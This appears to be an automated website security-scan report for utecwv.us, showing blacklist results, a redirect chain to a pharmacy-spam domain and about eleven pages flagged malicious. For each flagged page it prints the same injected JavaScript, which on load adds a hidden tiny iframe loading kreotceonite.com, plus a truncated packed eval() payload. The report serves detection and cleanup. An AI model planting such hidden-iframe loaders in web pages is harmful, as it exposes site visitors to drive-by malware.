Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=utecwv.us
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://utecwv.us/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://utecwv.us/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: utecwv.us Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Cache-Control: post-check=0, pre-check=0 Connection: close Date: Sat, 13 Dec 2014 08:50:13 GMT Pragma: no-cache Location: http://rxsummerdeals.com Server: Apache Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 13 Dec 2014 08:50:14 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: dc799ac178027c6bcba36eb9549cc837=ftqj2htgicdg234lo2gpv4ad47; path=/ | malicious |
URL: http://rxsummerdeals.com (imitation of visitor from search engine) GET / HTTP/1.1 Host: rxsummerdeals.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 08:50:14 GMT Location: http://14-7721.gbcinternetenforcement.net Content-Length: 0 X-Powered-By: Servlet/2.4 JSP/2.0 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://utecwv.us/ | 200 OK Content-Length: 38241 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/media/system/js/caption.js | 200 OK Content-Length: 2150 Content-Type: application/x-javascript | clean |
http://utecwv.us/modules/mod_rokslideshow/tmpl/rokslideshow.js | 200 OK Content-Length: 7925 Content-Type: application/x-javascript | clean |
http://utecwv.us/templates/js_optimus/js/barmenu.js | 200 OK Content-Length: 384 Content-Type: application/x-javascript | clean |
http://utecwv.us/index.php?option=com_content&view=section&id=5&Itemid=73 | 200 OK Content-Length: 34186 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=76&Itemid=92 | 200 OK Content-Length: 32407 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=section&layout=blog&id=5&Itemid=91 | 200 OK Content-Length: 50841 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=70&Itemid=74 | 200 OK Content-Length: 32201 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=81&Itemid=77 | 200 OK Content-Length: 33587 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=74&Itemid=78 | 200 OK Content-Length: 31861 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=82&Itemid=103 | 200 OK Content-Length: 32143 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=84&Itemid=79 | 200 OK Content-Length: 32289 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=83&Itemid=100 | 200 OK Content-Length: 32230 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=75&Itemid=80 | 200 OK Content-Length: 31578 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://utecwv.us/index.php?option=com_content&view=article&id=79&Itemid=102 | 200 OK Content-Length: 31742 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
|